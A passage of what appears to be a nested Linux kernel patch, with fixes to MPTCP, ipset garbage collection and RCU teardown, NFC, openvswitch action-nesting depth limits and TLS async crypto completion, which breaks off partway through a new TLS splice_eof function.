+-	if (tcp_rtx_and_write_queues_empty(sk))
+-		return false;
+-
+ 	/* the closing socket has some data untransmitted and/or unacked:
+ 	 * some data in the mptcp rtx queue has not really xmitted yet.
+ 	 * keep it simple and re-inject the whole mptcp level rtx queue
+@@ -2422,7 +2422,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out_release;
+ 	}
+ 
+-	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
++	dispose_it = msk->free_first || ssk != msk->first;
+ 	if (dispose_it)
+ 		list_del(&subflow->node);
+ 
+@@ -2440,7 +2440,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+ 		__mptcp_subflow_disconnect(ssk, subflow, flags);
+-		msk->subflow->state = SS_UNCONNECTED;
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3144,7 +3143,6 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	msk->last_snd = NULL;
+ 	WRITE_ONCE(msk->flags, 0);
+ 	msk->cb_flags = 0;
+-	msk->push_pending = 0;
+ 	msk->recovery = false;
+ 	msk->can_ack = false;
+ 	msk->fully_established = false;
+@@ -3341,10 +3339,10 @@ static void mptcp_destroy(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	/* clears msk->subflow, allowing the following to close
+-	 * even the initial subflow
+-	 */
+ 	mptcp_dispose_initial_subflow(msk);
++
++	/* allow the following to close even the initial subflow */
++	msk->free_first = 1;
+ 	mptcp_destroy_common(msk, 0);
+ 	sk_sockets_allocated_dec(sk);
+ }
+@@ -3388,8 +3386,7 @@ static void mptcp_release_cb(struct sock *sk)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	for (;;) {
+-		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED) |
+-				      msk->push_pending;
++		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED);
+ 		struct list_head join_list;
+ 
+ 		if (!flags)
+@@ -3405,7 +3402,6 @@ static void mptcp_release_cb(struct sock *sk)
+ 		 *    datapath acquires the msk socket spinlock while helding
+ 		 *    the subflow socket lock
+ 		 */
+-		msk->push_pending = 0;
+ 		msk->cb_flags &= ~flags;
+ 		spin_unlock_bh(&sk->sk_lock.slock);
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 4ec8e0a81b5a4..259672cc344f3 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -272,7 +272,6 @@ struct mptcp_sock {
+ 	int		rmem_released;
+ 	unsigned long	flags;
+ 	unsigned long	cb_flags;
+-	unsigned long	push_pending;
+ 	bool		recovery;		/* closing subflow write queue reinjected */
+ 	bool		can_ack;
+ 	bool		fully_established;
+@@ -287,7 +286,8 @@ struct mptcp_sock {
+ 			cork:1,
+ 			nodelay:1,
+ 			fastopening:1,
+-			in_accept_queue:1;
++			in_accept_queue:1,
++			free_first:1;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+diff --git a/net/netfilter/ipset/ip_set_bitmap_gen.h b/net/netfilter/ipset/ip_set_bitmap_gen.h
+index 26ab0e9612d82..9523104a90da4 100644
+--- a/net/netfilter/ipset/ip_set_bitmap_gen.h
++++ b/net/netfilter/ipset/ip_set_bitmap_gen.h
+@@ -28,6 +28,7 @@
+ #define mtype_del		IPSET_TOKEN(MTYPE, _del)
+ #define mtype_list		IPSET_TOKEN(MTYPE, _list)
+ #define mtype_gc		IPSET_TOKEN(MTYPE, _gc)
++#define mtype_cancel_gc		IPSET_TOKEN(MTYPE, _cancel_gc)
+ #define mtype			MTYPE
+ 
+ #define get_ext(set, map, id)	((map)->extensions + ((set)->dsize * (id)))
+@@ -57,9 +58,6 @@ mtype_destroy(struct ip_set *set)
+ {
+ 	struct mtype *map = set->data;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		del_timer_sync(&map->gc);
+-
+ 	if (set->dsize && set->extensions & IPSET_EXT_DESTROY)
+ 		mtype_ext_cleanup(set);
+ 	ip_set_free(map->members);
+@@ -288,6 +286,15 @@ mtype_gc(struct timer_list *t)
+ 	add_timer(&map->gc);
+ }
+ 
++static void
++mtype_cancel_gc(struct ip_set *set)
++{
++	struct mtype *map = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		del_timer_sync(&map->gc);
++}
++
+ static const struct ip_set_type_variant mtype = {
+ 	.kadt	= mtype_kadt,
+ 	.uadt	= mtype_uadt,
+@@ -301,6 +308,7 @@ static const struct ip_set_type_variant mtype = {
+ 	.head	= mtype_head,
+ 	.list	= mtype_list,
+ 	.same_set = mtype_same_set,
++	.cancel_gc = mtype_cancel_gc,
+ };
+ 
+ #endif /* __IP_SET_BITMAP_IP_GEN_H */
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index d47dfdcb899b0..f645da82d826e 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1156,6 +1156,7 @@ static int ip_set_create(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return ret;
+ 
+ cleanup:
++	set->variant->cancel_gc(set);
+ 	set->variant->destroy(set);
+ put_out:
+ 	module_put(set->type->me);
+@@ -1184,6 +1185,14 @@ ip_set_destroy_set(struct ip_set *set)
+ 	kfree(set);
+ }
+ 
++static void
++ip_set_destroy_set_rcu(struct rcu_head *head)
++{
++	struct ip_set *set = container_of(head, struct ip_set, rcu);
++
++	ip_set_destroy_set(set);
++}
++
+ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			  const struct nlattr * const attr[])
+ {
+@@ -1195,8 +1204,6 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (unlikely(protocol_min_failed(attr)))
+ 		return -IPSET_ERR_PROTOCOL;
+ 
+-	/* Must wait for flush to be really finished in list:set */
+-	rcu_barrier();
+ 
+ 	/* Commands are serialized and references are
+ 	 * protected by the ip_set_ref_lock.
+@@ -1208,8 +1215,10 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	 * counter, so if it's already zero, we can proceed
+ 	 * without holding the lock.
+ 	 */
+-	read_lock_bh(&ip_set_ref_lock);
+ 	if (!attr[IPSET_ATTR_SETNAME]) {
++		/* Must wait for flush to be really finished in list:set */
++		rcu_barrier();
++		read_lock_bh(&ip_set_ref_lock);
+ 		for (i = 0; i < inst->ip_set_max; i++) {
+ 			s = ip_set(inst, i);
+ 			if (s && (s->ref || s->ref_netlink)) {
+@@ -1223,6 +1232,8 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			s = ip_set(inst, i);
+ 			if (s) {
+ 				ip_set(inst, i) = NULL;
++				/* Must cancel garbage collectors */
++				s->variant->cancel_gc(s);
+ 				ip_set_destroy_set(s);
+ 			}
+ 		}
+@@ -1230,6 +1241,9 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		inst->is_destroyed = false;
+ 	} else {
+ 		u32 flags = flag_exist(info->nlh);
++		u16 features = 0;
++
++		read_lock_bh(&ip_set_ref_lock);
+ 		s = find_set_and_id(inst, nla_data(attr[IPSET_ATTR_SETNAME]),
+ 				    &i);
+ 		if (!s) {
+@@ -1240,10 +1254,16 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			ret = -IPSET_ERR_BUSY;
+ 			goto out;
+ 		}
++		features = s->type->features;
+ 		ip_set(inst, i) = NULL;
+ 		read_unlock_bh(&ip_set_ref_lock);
+-
+-		ip_set_destroy_set(s);
++		if (features & IPSET_TYPE_NAME) {
++			/* Must wait for flush to be really finished  */
++			rcu_barrier();
++		}
++		/* Must cancel garbage collectors */
++		s->variant->cancel_gc(s);
++		call_rcu(&s->rcu, ip_set_destroy_set_rcu);
+ 	}
+ 	return 0;
+ out:
+@@ -1396,9 +1416,6 @@ static int ip_set_swap(struct sk_buff *skb, const struct nfnl_info *info,
+ 	ip_set(inst, to_id) = from;
+ 	write_unlock_bh(&ip_set_ref_lock);
+ 
+-	/* Make sure all readers of the old set pointers are completed. */
+-	synchronize_rcu();
+-
+ 	return 0;
+ }
+ 
+@@ -2364,6 +2381,7 @@ ip_set_net_exit(struct net *net)
+ 		set = ip_set(inst, i);
+ 		if (set) {
+ 			ip_set(inst, i) = NULL;
++			set->variant->cancel_gc(set);
+ 			ip_set_destroy_set(set);
+ 		}
+ 	}
+@@ -2411,8 +2429,11 @@ ip_set_fini(void)
+ {
+ 	nf_unregister_sockopt(&so_set);
+ 	nfnetlink_subsys_unregister(&ip_set_netlink_subsys);
+-
+ 	unregister_pernet_subsys(&ip_set_net_ops);
++
++	/* Wait for call_rcu() in destroy */
++	rcu_barrier();
++
+ 	pr_debug("these are the famous last words\n");
+ }
+ 
+diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
+index 7499192af5866..ef04e556aadb4 100644
+--- a/net/netfilter/ipset/ip_set_hash_gen.h
++++ b/net/netfilter/ipset/ip_set_hash_gen.h
+@@ -210,6 +210,7 @@ htable_size(u8 hbits)
+ #undef mtype_gc_do
+ #undef mtype_gc
+ #undef mtype_gc_init
++#undef mtype_cancel_gc
+ #undef mtype_variant
+ #undef mtype_data_match
+ 
+@@ -254,6 +255,7 @@ htable_size(u8 hbits)
+ #define mtype_gc_do		IPSET_TOKEN(MTYPE, _gc_do)
+ #define mtype_gc		IPSET_TOKEN(MTYPE, _gc)
+ #define mtype_gc_init		IPSET_TOKEN(MTYPE, _gc_init)
++#define mtype_cancel_gc		IPSET_TOKEN(MTYPE, _cancel_gc)
+ #define mtype_variant		IPSET_TOKEN(MTYPE, _variant)
+ #define mtype_data_match	IPSET_TOKEN(MTYPE, _data_match)
+ 
+@@ -417,7 +419,7 @@ mtype_ahash_destroy(struct ip_set *set, struct htable *t, bool ext_destroy)
+ 	u32 i;
+ 
+ 	for (i = 0; i < jhash_size(t->htable_bits); i++) {
+-		n = __ipset_dereference(hbucket(t, i));
++		n = (__force struct hbucket *)hbucket(t, i);
+ 		if (!n)
+ 			continue;
+ 		if (set->extensions & IPSET_EXT_DESTROY && ext_destroy)
+@@ -437,10 +439,7 @@ mtype_destroy(struct ip_set *set)
+ 	struct htype *h = set->data;
+ 	struct list_head *l, *lt;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		cancel_delayed_work_sync(&h->gc.dwork);
+-
+-	mtype_ahash_destroy(set, ipset_dereference_nfnl(h->table), true);
++	mtype_ahash_destroy(set, (__force struct htable *)h->table, true);
+ 	list_for_each_safe(l, lt, &h->ad) {
+ 		list_del(l);
+ 		kfree(l);
+@@ -586,6 +585,15 @@ mtype_gc_init(struct htable_gc *gc)
+ 	queue_delayed_work(system_power_efficient_wq, &gc->dwork, HZ);
+ }
+ 
++static void
++mtype_cancel_gc(struct ip_set *set)
++{
++	struct htype *h = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		cancel_delayed_work_sync(&h->gc.dwork);
++}
++
+ static int
+ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 	  struct ip_set_ext *mext, u32 flags);
+@@ -1416,6 +1424,7 @@ static const struct ip_set_type_variant mtype_variant = {
+ 	.uref	= mtype_uref,
+ 	.resize	= mtype_resize,
+ 	.same_set = mtype_same_set,
++	.cancel_gc = mtype_cancel_gc,
+ 	.region_lock = true,
+ };
+ 
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index 5a67f79665742..6bc7019982b05 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -426,9 +426,6 @@ list_set_destroy(struct ip_set *set)
+ 	struct list_set *map = set->data;
+ 	struct set_elem *e, *n;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		del_timer_sync(&map->gc);
+-
+ 	list_for_each_entry_safe(e, n, &map->members, list) {
+ 		list_del(&e->list);
+ 		ip_set_put_byindex(map->net, e->id);
+@@ -545,6 +542,15 @@ list_set_same_set(const struct ip_set *a, const struct ip_set *b)
+ 	       a->extensions == b->extensions;
+ }
+ 
++static void
++list_set_cancel_gc(struct ip_set *set)
++{
++	struct list_set *map = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		del_timer_sync(&map->gc);
++}
++
+ static const struct ip_set_type_variant set_variant = {
+ 	.kadt	= list_set_kadt,
+ 	.uadt	= list_set_uadt,
+@@ -558,6 +564,7 @@ static const struct ip_set_type_variant set_variant = {
+ 	.head	= list_set_head,
+ 	.list	= list_set_list,
+ 	.same_set = list_set_same_set,
++	.cancel_gc = list_set_cancel_gc,
+ };
+ 
+ static void
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index 90e275bb3e5d7..a3a8ddca99189 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -57,7 +57,7 @@
+ 
+ /* Jump to label if @reg is zero */
+ #define NFT_PIPAPO_AVX2_NOMATCH_GOTO(reg, label)			\
+-	asm_volatile_goto("vptest %%ymm" #reg ", %%ymm" #reg ";"	\
++	asm goto("vptest %%ymm" #reg ", %%ymm" #reg ";"	\
+ 			  "je %l[" #label "]" : : : : label)
+ 
+ /* Store 256 bits from YMM register into memory. Contrary to bucket load
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index 7535afd1537e9..b5071a2f597d4 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1207,6 +1207,10 @@ void nci_free_device(struct nci_dev *ndev)
+ {
+ 	nfc_free_device(ndev->nfc_dev);
+ 	nci_hci_deallocate(ndev);
++
++	/* drop partial rx data packet if present */
++	if (ndev->rx_data_reassembly)
++		kfree_skb(ndev->rx_data_reassembly);
+ 	kfree(ndev);
+ }
+ EXPORT_SYMBOL(nci_free_device);
+diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
+index ead5418c126e3..e3c85ceb1f0a5 100644
+--- a/net/openvswitch/flow_netlink.c
++++ b/net/openvswitch/flow_netlink.c
+@@ -47,6 +47,7 @@ struct ovs_len_tbl {
+ 
+ #define OVS_ATTR_NESTED -1
+ #define OVS_ATTR_VARIABLE -2
++#define OVS_COPY_ACTIONS_MAX_DEPTH 16
+ 
+ static bool actions_may_change_flow(const struct nlattr *actions)
+ {
+@@ -2543,13 +2544,15 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 				  const struct sw_flow_key *key,
+ 				  struct sw_flow_actions **sfa,
+ 				  __be16 eth_type, __be16 vlan_tci,
+-				  u32 mpls_label_count, bool log);
++				  u32 mpls_label_count, bool log,
++				  u32 depth);
+ 
+ static int validate_and_copy_sample(struct net *net, const struct nlattr *attr,
+ 				    const struct sw_flow_key *key,
+ 				    struct sw_flow_actions **sfa,
+ 				    __be16 eth_type, __be16 vlan_tci,
+-				    u32 mpls_label_count, bool log, bool last)
++				    u32 mpls_label_count, bool log, bool last,
++				    u32 depth)
+ {
+ 	const struct nlattr *attrs[OVS_SAMPLE_ATTR_MAX + 1];
+ 	const struct nlattr *probability, *actions;
+@@ -2600,7 +2603,8 @@ static int validate_and_copy_sample(struct net *net, const struct nlattr *attr,
+ 		return err;
+ 
+ 	err = __ovs_nla_copy_actions(net, actions, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -2615,7 +2619,8 @@ static int validate_and_copy_dec_ttl(struct net *net,
+ 				     const struct sw_flow_key *key,
+ 				     struct sw_flow_actions **sfa,
+ 				     __be16 eth_type, __be16 vlan_tci,
+-				     u32 mpls_label_count, bool log)
++				     u32 mpls_label_count, bool log,
++				     u32 depth)
+ {
+ 	const struct nlattr *attrs[OVS_DEC_TTL_ATTR_MAX + 1];
+ 	int start, action_start, err, rem;
+@@ -2658,7 +2663,8 @@ static int validate_and_copy_dec_ttl(struct net *net,
+ 		return action_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, actions, key, sfa, eth_type,
+-				     vlan_tci, mpls_label_count, log);
++				     vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 	if (err)
+ 		return err;
+ 
+@@ -2672,7 +2678,8 @@ static int validate_and_copy_clone(struct net *net,
+ 				   const struct sw_flow_key *key,
+ 				   struct sw_flow_actions **sfa,
+ 				   __be16 eth_type, __be16 vlan_tci,
+-				   u32 mpls_label_count, bool log, bool last)
++				   u32 mpls_label_count, bool log, bool last,
++				   u32 depth)
+ {
+ 	int start, err;
+ 	u32 exec;
+@@ -2692,7 +2699,8 @@ static int validate_and_copy_clone(struct net *net,
+ 		return err;
+ 
+ 	err = __ovs_nla_copy_actions(net, attr, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 	if (err)
+ 		return err;
+ 
+@@ -3061,7 +3069,7 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 					   struct sw_flow_actions **sfa,
+ 					   __be16 eth_type, __be16 vlan_tci,
+ 					   u32 mpls_label_count,
+-					   bool log, bool last)
++					   bool log, bool last, u32 depth)
+ {
+ 	const struct nlattr *acts_if_greater, *acts_if_lesser_eq;
+ 	struct nlattr *a[OVS_CHECK_PKT_LEN_ATTR_MAX + 1];
+@@ -3109,7 +3117,8 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 		return nested_acts_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, acts_if_lesser_eq, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -3122,7 +3131,8 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 		return nested_acts_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, acts_if_greater, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -3150,12 +3160,16 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 				  const struct sw_flow_key *key,
+ 				  struct sw_flow_actions **sfa,
+ 				  __be16 eth_type, __be16 vlan_tci,
+-				  u32 mpls_label_count, bool log)
++				  u32 mpls_label_count, bool log,
++				  u32 depth)
+ {
+ 	u8 mac_proto = ovs_key_mac_proto(key);
+ 	const struct nlattr *a;
+ 	int rem, err;
+ 
++	if (depth > OVS_COPY_ACTIONS_MAX_DEPTH)
++		return -EOVERFLOW;
++
+ 	nla_for_each_nested(a, attr, rem) {
+ 		/* Expected argument lengths, (u32)-1 for variable length. */
+ 		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
+@@ -3350,7 +3364,7 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 			err = validate_and_copy_sample(net, a, key, sfa,
+ 						       eth_type, vlan_tci,
+ 						       mpls_label_count,
+-						       log, last);
++						       log, last, depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3421,7 +3435,7 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 			err = validate_and_copy_clone(net, a, key, sfa,
+ 						      eth_type, vlan_tci,
+ 						      mpls_label_count,
+-						      log, last);
++						      log, last, depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3435,7 +3449,8 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 							      eth_type,
+ 							      vlan_tci,
+ 							      mpls_label_count,
+-							      log, last);
++							      log, last,
++							      depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3445,7 +3460,8 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 		case OVS_ACTION_ATTR_DEC_TTL:
+ 			err = validate_and_copy_dec_ttl(net, a, key, sfa,
+ 							eth_type, vlan_tci,
+-							mpls_label_count, log);
++							mpls_label_count, log,
++							depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3485,7 +3501,8 @@ int ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 
+ 	(*sfa)->orig_len = nla_len(attr);
+ 	err = __ovs_nla_copy_actions(net, attr, key, sfa, key->eth.type,
+-				     key->eth.vlan.tci, mpls_label_count, log);
++				     key->eth.vlan.tci, mpls_label_count, log,
++				     0);
+ 	if (err)
+ 		ovs_nla_free_flow_actions(*sfa);
+ 
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 0672acab27731..4922668fefaa8 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -97,6 +97,7 @@ void tls_update_rx_zc_capable(struct tls_context *tls_ctx);
+ void tls_sw_strparser_arm(struct sock *sk, struct tls_context *ctx);
+ void tls_sw_strparser_done(struct tls_context *tls_ctx);
+ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);
++void tls_sw_splice_eof(struct socket *sock);
+ int tls_sw_sendpage_locked(struct sock *sk, struct page *page,
+ 			   int offset, size_t size, int flags);
+ int tls_sw_sendpage(struct sock *sk, struct page *page,
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 338a443fa47b2..80b42a3e78830 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -922,6 +922,7 @@ static void build_proto_ops(struct proto_ops ops[TLS_NUM_CONFIG][TLS_NUM_CONFIG]
+ 	ops[TLS_BASE][TLS_BASE] = *base;
+ 
+ 	ops[TLS_SW  ][TLS_BASE] = ops[TLS_BASE][TLS_BASE];
++	ops[TLS_SW  ][TLS_BASE].splice_eof	= tls_sw_splice_eof;
+ 	ops[TLS_SW  ][TLS_BASE].sendpage_locked	= tls_sw_sendpage_locked;
+ 
+ 	ops[TLS_BASE][TLS_SW  ] = ops[TLS_BASE][TLS_BASE];
+@@ -990,6 +991,7 @@ static void build_protos(struct proto prot[TLS_NUM_CONFIG][TLS_NUM_CONFIG],
+ 
+ 	prot[TLS_SW][TLS_BASE] = prot[TLS_BASE][TLS_BASE];
+ 	prot[TLS_SW][TLS_BASE].sendmsg		= tls_sw_sendmsg;
++	prot[TLS_SW][TLS_BASE].splice_eof	= tls_sw_splice_eof;
+ 	prot[TLS_SW][TLS_BASE].sendpage		= tls_sw_sendpage;
+ 
+ 	prot[TLS_BASE][TLS_SW] = prot[TLS_BASE][TLS_BASE];
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 0323040d34bc6..c8cbdd02a784e 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -62,6 +62,7 @@ struct tls_decrypt_ctx {
+ 	u8 iv[MAX_IV_SIZE];
+ 	u8 aad[TLS_MAX_AAD_SIZE];
+ 	u8 tail;
++	bool free_sgout;
+ 	struct scatterlist sg[];
+ };
+ 
+@@ -186,7 +187,6 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	struct aead_request *aead_req = crypto_get_completion_data(data);
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(aead_req);
+ 	struct scatterlist *sgout = aead_req->dst;
+-	struct scatterlist *sgin = aead_req->src;
+ 	struct tls_sw_context_rx *ctx;
+ 	struct tls_decrypt_ctx *dctx;
+ 	struct tls_context *tls_ctx;
+@@ -212,7 +212,7 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	}
+ 
+ 	/* Free the destination pages if skb was not decrypted inplace */
+-	if (sgout != sgin) {
++	if (dctx->free_sgout) {
+ 		/* Skip the first S/G entry as it points to AAD */
+ 		for_each_sg(sg_next(sgout), sg, UINT_MAX, pages) {
+ 			if (!sg)
+@@ -223,10 +223,17 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 
+ 	kfree(aead_req);
+ 
+-	spin_lock_bh(&ctx->decrypt_compl_lock);
+-	if (!atomic_dec_return(&ctx->decrypt_pending))
++	if (atomic_dec_and_test(&ctx->decrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-	spin_unlock_bh(&ctx->decrypt_compl_lock);
++}
++
++static int tls_decrypt_async_wait(struct tls_sw_context_rx *ctx)
++{
++	if (!atomic_dec_and_test(&ctx->decrypt_pending))
++		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	atomic_inc(&ctx->decrypt_pending);
++
++	return ctx->async_wait.err;
+ }
+ 
+ static int tls_do_decryption(struct sock *sk,
+@@ -252,6 +259,7 @@ static int tls_do_decryption(struct sock *sk,
+ 		aead_request_set_callback(aead_req,
+ 					  CRYPTO_TFM_REQ_MAY_BACKLOG,
+ 					  tls_decrypt_done, aead_req);
++		DEBUG_NET_WARN_ON_ONCE(atomic_read(&ctx->decrypt_pending) < 1);
+ 		atomic_inc(&ctx->decrypt_pending);
+ 	} else {
+ 		aead_request_set_callback(aead_req,
+@@ -441,7 +449,6 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 	struct tls_rec *rec;
+ 	bool ready = false;
+ 	struct sock *sk;
+-	int pending;
+ 
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+@@ -481,12 +488,8 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 			ready = true;
+ 	}
+ 
+-	spin_lock_bh(&ctx->encrypt_compl_lock);
+-	pending = atomic_dec_return(&ctx->encrypt_pending);
+-
+-	if (!pending && ctx->async_notify)
++	if (atomic_dec_and_test(&ctx->encrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-	spin_unlock_bh(&ctx->encrypt_compl_lock);
+ 
+ 	if (!ready)
+ 		return;
+@@ -496,6 +499,15 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 		schedule_delayed_work(&ctx->tx_work.work, 1);
+ }
+ 
++static int tls_encrypt_async_wait(struct tls_sw_context_tx *ctx)
++{
++	if (!atomic_dec_and_test(&ctx->encrypt_pending))
++		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	atomic_inc(&ctx->encrypt_pending);
++
++	return ctx->async_wait.err;
++}
++
+ static int tls_do_encryption(struct sock *sk,
+ 			     struct tls_context *tls_ctx,
+ 			     struct tls_sw_context_tx *ctx,
+@@ -542,6 +554,7 @@ static int tls_do_encryption(struct sock *sk,
+ 
+ 	/* Add the record in tx_list */
+ 	list_add_tail((struct list_head *)&rec->list, &ctx->tx_list);
++	DEBUG_NET_WARN_ON_ONCE(atomic_read(&ctx->encrypt_pending) < 1);
+ 	atomic_inc(&ctx->encrypt_pending);
+ 
+ 	rc = crypto_aead_encrypt(aead_req);
+@@ -953,7 +966,6 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	int num_zc = 0;
+ 	int orig_size;
+ 	int ret = 0;
+-	int pending;
+ 
+ 	if (msg->msg_flags & ~(MSG_MORE | MSG_DONTWAIT | MSG_NOSIGNAL |
+ 			       MSG_CMSG_COMPAT))
+@@ -1122,24 +1134,12 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	if (!num_async) {
+ 		goto send_end;
+ 	} else if (num_zc) {
+-		/* Wait for pending encryptions to get completed */
+-		spin_lock_bh(&ctx->encrypt_compl_lock);
+-		ctx->async_notify = true;
+-
+-		pending = atomic_read(&ctx->encrypt_pending);
+-		spin_unlock_bh(&ctx->encrypt_compl_lock);
+-		if (pending)
+-			crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
+-		else
+-			reinit_completion(&ctx->async_wait.completion);
+-
+-		/* There can be no concurrent accesses, since we have no
+-		 * pending encrypt operations
+-		 */
+-		WRITE_ONCE(ctx->async_notify, false);
++		int err;
+ 
+-		if (ctx->async_wait.err) {
+-			ret = ctx->async_wait.err;
++		/* Wait for pending encryptions to get completed */
++		err = tls_encrypt_async_wait(ctx);
++		if (err) {
++			ret = err;
+ 			copied = 0;
+ 		}
+ 	}
+@@ -1158,6 +1158,67 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	return copied > 0 ? copied : ret;
+ }
+ 
++/*
++ * Handle unexpected EOF during splice without SPLICE_F_MORE set.
++ */
++void tls_sw_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct tls_context *tls_ctx = tls_get_ctx(sk);
++	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
++	struct tls_rec *rec;
++	struct sk_msg *msg_pl;
++	ssize_t copied = 0;
++	bool retrying = false;
++	int ret = 0;
++
++	if (!ctx->open_rec)
++		return;
++
++	mutex_lock(&tls_ctx->tx_lock);
++	lock_sock(sk);
++
++retry:
++	/* same checks as in tls_sw_push_pending_record() */
++	rec = ctx->open_rec;
++	if (!rec)
++		goto unlock;
++
++	msg_pl = &rec->msg_plaintext;
++	if (msg_pl->sg.size == 0)
++		goto unlock;
++
++	/* Check the BPF advisor and perform transmission. */
++	ret = bpf_exec_tx_verdict(msg_pl, sk, false, TLS_RECORD_TYPE_DATA,
++				  &copied, 0);
++	switch (ret) {
++	case 0:
++	case -EAGAIN:
++		if (retrying)
++			goto unlock;
++		retrying = true;
++		goto retry;
